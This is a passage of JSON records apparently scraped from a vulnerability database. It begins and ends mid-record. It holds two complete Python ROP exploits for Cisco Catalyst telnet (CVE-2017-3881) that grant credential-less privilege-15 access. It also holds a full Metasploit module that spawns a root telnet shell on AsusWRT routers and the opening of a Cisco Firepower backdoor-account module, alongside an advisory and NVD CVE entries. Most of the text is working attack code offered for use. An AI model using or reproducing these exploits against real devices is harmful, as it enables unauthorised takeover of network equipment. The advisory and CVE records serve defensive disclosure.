True:\r\n payload += '\\x00\\x00\\x99\\x9c' # +12 set address of func that rets 1\r\nelse:\r\n payload += '\\x00\\x04\\xeA\\xe0' # unset \r\npayload += 'BBBB' # +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xe1\\xa9\\xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC' # +8 \r\npayload += 'DDDD' # +12\r\npayload += 'EEEE' # +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x7b\\x5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x3d\\x55\\xc8' # +8 r1+8 = 0x23d55c8\r\npayload += 'FFFF' # +12 \r\npayload += 'GGGG' # +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6c\\xb3\\xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n payload += '\\x00\\x27\\x0b\\x94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; \r\nelse:\r\n payload += '\\x00\\x04\\xe7\\x78' # unset\r\npayload += 'HHHH' # +12\r\npayload += 'IIII' # +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x4a\\xcf\\x98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ' # +8 r1 points here at third gadget\r\npayload += 'KKKK' # +12\r\npayload += 'LLLL' # +16\r\npayload += '\\x01\\x14\\xe7\\xec' # +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n \r\ns.send(payload)\r\n \r\nprint '[+] All done'\r\n \r\ns.close()\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/27583", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T22:03:47", "description": "Exploit for hardware platform in category remote exploits", "cvss3": {}, "published": "2017-06-06T00:00:00", "type": "zdt", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE1 - ROCEM Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-06-06T00:00:00", "id": "1337DAY-ID-27904", "href": "https://0day.today/exploit/description/27904", "sourceData": "#!/usr/bin/python\r\n# Author:\r\n# Artem Kondratenko (@artkond)\r\n \r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n \r\nset_credless = True\r\n \r\nif len(sys.argv) < 3:\r\n print sys.argv[0] + ' [host] --set/--unset'\r\n sys.exit()\r\nelif sys.argv[2] == '--unset':\r\n set_credless = False\r\nelif sys.argv[2] == '--set':\r\n pass\r\nelse:\r\n print sys.argv[0] + ' [host] --set/--unset'\r\n sys.exit()\r\n \r\n \r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n \r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\n#sleep(0.5)\r\nprint '[+] Sending cluster option'\r\n \r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n \r\n \r\n \r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x2c\\x8b\\x74' # +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n payload += '\\x00\\x00\\x99\\x80' # +12 set address of func that rets 1\r\nelse:\r\n payload += '\\x00\\x04\\xea\\x58' # unset \r\npayload += 'BBBB' # +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xdf\\xfb\\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC' # +8 \r\npayload += 'DDDD' # +12\r\npayload += 'EEEE' # +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x78\\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x2c\\x8b\\x60' # +8 r1+8 = 0x022c8b60\r\npayload += 'FFFF' # +12 \r\npayload += 'GGGG' # +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6b\\xa1\\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n payload += '\\x00\\x12\\x52\\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; \r\nelse:\r\n payload += '\\x00\\x04\\xe6\\xf0' # unset\r\npayload += 'HHHH' # +12\r\npayload += 'IIII' # +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x48\\xe5\\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ' # +8 r1 points here at third gadget\r\npayload += 'KKKK' # +12\r\npayload += 'LLLL' # +16\r\npayload += '\\x01\\x13\\x31\\xa8' # +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n \r\ns.send(payload)\r\n \r\nprint '[+] All done'\r\n \r\ns.close()\n\n# 0day.today [2018-03-12] #", "sourceHref": "https://0day.today/exploit/27904", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-06-23T15:10:48", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. The do_vpnupload_post function in router/httpd/web.c in vpnupload.cgi provides functionality for setting NVRAM configuration values, which allows attackers to set the admin password and launch an SSH daemon (or enable infosvr command mode), and consequently obtain remote administrative access, via a crafted request. This is available to unauthenticated attackers in conjunction with CVE-2018-5999.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-6000", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-6000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6000", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-23T15:10:49", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. In the handle_request function in router/httpd/httpd.c, processing of POST requests continues even if authentication fails.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-5999", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5999", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-03T14:39:40", "description": "The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary commands via crafted web-application parameters, aka Bug ID CSCva30872.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T10:59:00", "type": "cve", "title": "CVE-2016-6433", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2021-01-05T17:39:00", "cpe": ["cpe:/a:cisco:firepower_management_center:5.4.1.3", "cpe:/a:cisco:firepower_management_center:5.4.1", "cpe:/a:cisco:firepower_management_center:6.0.1", "cpe:/a:cisco:firepower_management_center:5.3.1.4", "cpe:/a:cisco:firepower_management_center:5.4.1.2", "cpe:/a:cisco:firepower_management_center:5.4.1.1", "cpe:/a:cisco:firepower_management_center:5.3.1", "cpe:/a:cisco:firepower_management_center:5.3.0.3", "cpe:/a:cisco:firepower_management_center:5.3.1.5", "cpe:/a:cisco:firepower_management_center:5.2.0", "cpe:/a:cisco:firepower_management_center:5.3.0.4", "cpe:/a:cisco:firepower_management_center:5.3.1.6", "cpe:/a:cisco:firepower_management_center:5.4.0", "cpe:/a:cisco:firepower_management_center:5.3.0.2", "cpe:/a:cisco:firepower_management_center:5.3.1.3", "cpe:/a:cisco:firepower_management_center:5.4.1.5", "cpe:/a:cisco:firepower_management_center:5.4.0.2", "cpe:/a:cisco:firepower_management_center:5.3.0", "cpe:/a:cisco:firepower_management_center:5.4.1.6", "cpe:/a:cisco:firepower_management_center:5.4.1.4"], "id": "CVE-2016-6433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6433", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cisco:firepower_management_center:5.3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T14:59:49", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T22:59:00", "type": "cve", "title": "CVE-2017-3881", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2020-08-07T20:08:00", "cpe": ["cpe:/o:cisco:ios_xe:3.9e", "cpe:/o:cisco:ios:15.1\$3\$svs"], "id": "CVE-2017-3881", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:ios_xe:3.9e:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios:15.1\$3\$svs:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-02-24T00:58:03", "description": "", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "packetstorm", "title": "AsusWRT LAN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "PACKETSTORM:146560", "href": "https://packetstormsecurity.com/files/146560/AsusWRT-LAN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to \nperform a POST in certain cases. This can be combined with another vulnerability in \nthe VPN configuration upload routine that sets NVRAM configuration variables directly \nfrom the POST request to enable a special command mode. \nThis command mode can then be abused by sending a UDP packet to infosvr, which is running \non port UDP 9999 to directly execute commands as root. \nThis exploit leverages that to start telnetd in a random port, and then connects to it. \nIt has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], \n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], \n['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], \n['CVE', '2018-5999'], \n['CVE', '2018-6000'] \n], \n'Targets' => \n[ \n[ 'AsusWRT < v3.0.0.4.384.10007', \n{ \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find', \n}, \n}, \n} \n], \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, \n'DisclosureDate' => 'Jan 22 2018', \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(9999) \n]) \n \nregister_advanced_options( \n[ \nOptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) \n]) \nend \n \ndef exploit \n# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD \n# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! \npost_data = Rex::MIME::Message.new \npost_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\") \n \ndata = post_data.to_s \n \nres = send_request_cgi({ \n'uri' => \"/vpnupload.cgi\", \n'method' => 'POST', \n'rport' => datastore['ASUSWRTPORT'], \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \nif res and res.code == 200 \nprint_good(\"#{peer} - Successfully set the ateCommand_flag variable.\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\") \nend \n \n \n# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. \ninfo_pdu_size = 512 # expected packet size, not sure what the extra bytes are \nr = Random.new \n \nibox_comm_pkt_hdr_ex = \n[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC \n[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 \n[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 \nr.bytes(4) + # Info, don't know what this is \nr.bytes(6) + # MAC address \nr.bytes(32) # Password \n \ntelnet_port = rand((2**16)-1024)+1024 \ncmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*') \npkt_syscmd = \n[cmd.length,0x00].pack('C*') + # cmd length \ncmd # our command \n \npkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) \n \nconnect_udp \nudp_sock.put(pkt_final) # we could process the response, but we don't care \ndisconnect_udp \n \nprint_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\") \nsleep(10) \n \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) \nif not sock.nil? \nprint_good(\"#{peer} - Success, shell incoming!\") \nreturn handler(sock) \nend \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e \nsock.close if sock \nend \n \nprint_bad(\"#{peer} - Well that didn't work... try again?\") \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146560/asuswrt_lan_rce.rb.txt"}, {"lastseen": "2018-01-26T08:23:18", "description": "", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "packetstorm", "title": "AsusWRT Router Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-26T00:00:00", "id": "PACKETSTORM:146102", "href": "https://packetstormsecurity.com/files/146102/AsusWRT-Router-Remote-Code-Execution.html", "sourceData": "`>> Unauthenticated LAN remote code execution in AsusWRT \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 22/01/2018 / Last updated: 25/01/2018 \n \n \n>> Background and summary \nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. \nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. \n \nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. \n \nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). \n \n \n>> Technical details: \n#1 \nVulnerability: HTTP server authentication bypass \nCVE-2018-5999 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. \nIn AsusWRT_source/router/httpd/httpd.c: \n \nhandle_request(void) \n{ \n... \nhandler->auth(auth_userid, auth_passwd, auth_realm); \nauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); \n \nif (auth_result != 0) <--- auth fails \n{ \nif(strcasecmp(method, \"post\") == 0){ \nif (handler->input) { \nhandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed \n} \nsend_login_page(fromapp, auth_result, NULL, NULL, 0); \n} \n//if(!fromapp) http_logout(login_ip_tmp, cookies); \nreturn; \n} \n... \n} \n \nThis can (and will) be combined with other vulnerabilities to achieve remote code execution. \n \n \n#2 \nVulnerability: Unauthorised configuration change (NVRAM value setting) \nCVE-2018-6000 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. \nIn AsusWRT_source/router/httpd/web.c: \n \ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary) \n{ \n... \nif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) { \nif(strstr(post_buf, \"name=\\\"file\\\"\")) \nbreak; \nelse if(strstr(post_buf, \"name=\\\"\")) { \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \np = post_buf; \nname = strstr(p, \"\\\"\") + 1; \np = strstr(name, \"\\\"\"); \nstrcpy(p++, \"\\0\"); \nvalue = strstr(p, \"\\r\\n\\r\\n\") + 4; \np = strstr(value, \"\\r\"); \nstrcpy(p, \"\\0\"); \n//printf(\"%s=%s\\n\", name, value); \nnvram_set(name, value); \n} \n} \n... \n} \n \nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. \n \nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. \n \nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. \nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). \n \nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. \n \n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). \n \nPacket structure (from AsusWRT_source/router/shared/iboxcom.h): \n- Header \ntypedef struct iboxPKTEx \n{ \nBYTE ServiceID; \nBYTE PacketType; \nWORD OpCode; \nDWORD Info; // Or Transaction ID \nBYTE MacAddress[6]; \nBYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string \n} ibox_comm_pkt_hdr_ex; \n \n- Body \ntypedef struct iboxPKTCmd \n{ \nWORD len; \nBYTE cmd[420]; <--- command goes here \n} PKT_SYSCMD; // total 422 bytes \n \nA Metasploit module exploiting this vulnerability has been released [3]. \n \n \n>> Fix: \nUpgrade to AsusWRT v3.0.0.4.384.10007 or above. \nSee [4] for the very few details and new firmware released by Asus. \n \n \n>> References: \n[1] https://blogs.securiteam.com/index.php/archives/3589 \n[2] https://github.com/jduck/asus-cmd \n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb \n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business >> \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146102/asuswrt3-exec.txt"}, {"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140467", "href": "https://packetstormsecurity.com/files/140467/Cisco-Firepower-Management-Console-6.0-Post-Authentication-UserAdd.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::SSH \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Cisco Firepower Management Console. \nThe management system contains a configuration flaw that allows the www user to \nexecute the useradd binary, which can be abused to create backdoor accounts. \nAuthentication is required to exploit this vulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt', # Original discovery & PoC \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2016-6433' ], \n[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] \n], \n'Platform' => 'linux', \n'Arch' => 